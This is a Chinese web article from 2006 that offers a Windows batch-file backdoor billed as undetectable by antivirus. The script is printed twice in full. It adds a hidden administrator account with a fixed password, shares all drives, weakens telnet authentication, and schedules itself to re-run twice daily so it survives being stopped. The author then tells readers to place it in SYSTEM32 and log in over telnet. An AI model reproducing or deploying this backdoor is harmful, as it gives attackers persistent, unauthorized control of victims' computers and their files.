用批處理寫的后門 永不被殺
更新時間:2006年09月07日 00:00:00 作者:
代碼思路是影子鷹DESERT朋友的,原代碼比較麻煩,我做了改進,這個后門優(yōu)點就是小而且不會被殺,放到SYSTEM32目錄下就可以了 ,代碼如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會循環(huán)運行我們的程序了,即使被人停下來,過幾個小時,又回重新運行,呵呵~~
運行后TELNET IP上去,用戶名為xyt,密碼為hacker。
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
這樣就會循環(huán)運行我們的程序了,即使被人停下來,過幾個小時,又回重新運行,呵呵~~
運行后TELNET IP上去,用戶名為xyt,密碼為hacker。
相關(guān)文章
統(tǒng)計每個數(shù)的重復(fù)次數(shù),并按照重復(fù)次數(shù)由高到低排序的批處理
統(tǒng)計每個數(shù)的重復(fù)次數(shù),并按照重復(fù)次數(shù)由高到低排序2009-05-05通過批處理關(guān)閉135 137 445等端口的實現(xiàn)代碼(勒索病毒)
這篇文章主要介紹了通過批處理關(guān)閉135 137 445等端口的實現(xiàn)代碼,需要的朋友可以參考下2018-08-08